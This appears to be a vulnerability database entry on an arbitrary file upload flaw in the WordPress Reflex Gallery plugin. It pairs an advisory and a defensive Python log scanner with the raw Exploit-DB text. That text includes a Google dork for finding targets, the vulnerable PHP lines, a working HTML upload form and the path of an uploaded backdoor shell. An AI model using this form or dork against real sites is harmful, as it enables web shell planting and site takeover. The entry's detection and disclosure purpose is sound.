Vendor: Reflex Gallery
By: CrashBandicot @DosPerl
CVSS: 7.5 (HIGH)
CWE: 434 (Arbitrary File Upload)
Product Name: Reflex Gallery
Affected Version From: 3.1.2003
Affected Version To: 3.1.2003
Patch Exists: NO
Related CWE:
CPE: a:wordpress:reflex_gallery:3.1.3
Metasploit:
Other Scripts:
Platforms Tested: Windows
2015

WordPress Plugin Reflex Gallery – Arbitrary File Upload

This exploit allows an attacker to upload arbitrary files through the Reflex Gallery plugin for WordPress. The vulnerable file is php.php, the plugin's file-upload handler. It takes the Year and Month parameters from the GET request and uses them to build the upload folder, so by manipulating them the attacker can specify the folder location for the uploaded file. The exploit uploads a file using a form that posts to php.php with those parameters.

Mitigation:

Update to a patched version of the Reflex Gallery plugin.
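
One way to look for this upload pattern in web server access logs, as an added example that is not part of the original advisory or the Exploit-DB entry. It assumes common/combined log format; the function name `scan`, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Uploader endpoint named in the advisory.
UPLOADER = "/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php"
# Script extensions that should never be served from the uploads tree (assumed list).
SCRIPT_IN_UPLOADS = re.compile(r"/wp-content/uploads/.*\.(php\d?|phtml|phar)$", re.I)
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return (line_no, client_ip, reason) for each suspicious request."""
    findings = []
    uploaders = set()  # clients that POSTed to the uploader endpoint
    for no, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and url.path.endswith(UPLOADER):
            uploaders.add(ip)
            q = parse_qs(url.query)
            year = q.get("Year", [""])[0]
            month = q.get("Month", [""])[0]
            ok = re.fullmatch(r"\d{4}", year) and re.fullmatch(r"\d{2}", month)
            reason = "upload POST" if ok else "upload POST with non-date Year/Month"
            findings.append((no, ip, reason))
        elif SCRIPT_IN_UPLOADS.search(url.path) and status == "200":
            reason = ("script served from uploads after upload POST"
                      if ip in uploaders else "script served from uploads")
            findings.append((no, ip, reason))
    return findings

# Constructed sample log lines (documentation IP ranges, not from a real system).
SAMPLE = [
    '192.0.2.10 - - [08/Mar/2015:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120',
    '192.0.2.10 - - [08/Mar/2015:10:00:05 +0000] "POST /wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03 HTTP/1.1" 200 64',
    '192.0.2.10 - - [08/Mar/2015:10:00:09 +0000] "GET /wordpress/wp-content/uploads/2015/03/file.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [08/Mar/2015:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2015/03/photo.jpg HTTP/1.1" 200 90211',
    '198.51.100.7 - - [08/Mar/2015:10:03:00 +0000] "POST /wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=cache&Month=a HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any direct POST to this endpoint from a client that is not a logged-in administrator session is worth reviewing, as is any script file served from the uploads directory.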

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/reflex-gallery/
# Date: 08.03.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
# Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
# Version: 3.1.3 (Last)
# Tested on: Windows
 
# p0C : http://i.imgur.com/mj8yADU.png
 
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
  
Vulnerable File : php.php
50.      if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173.         $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
 
 
# Exploit :
 
<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
 
# Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php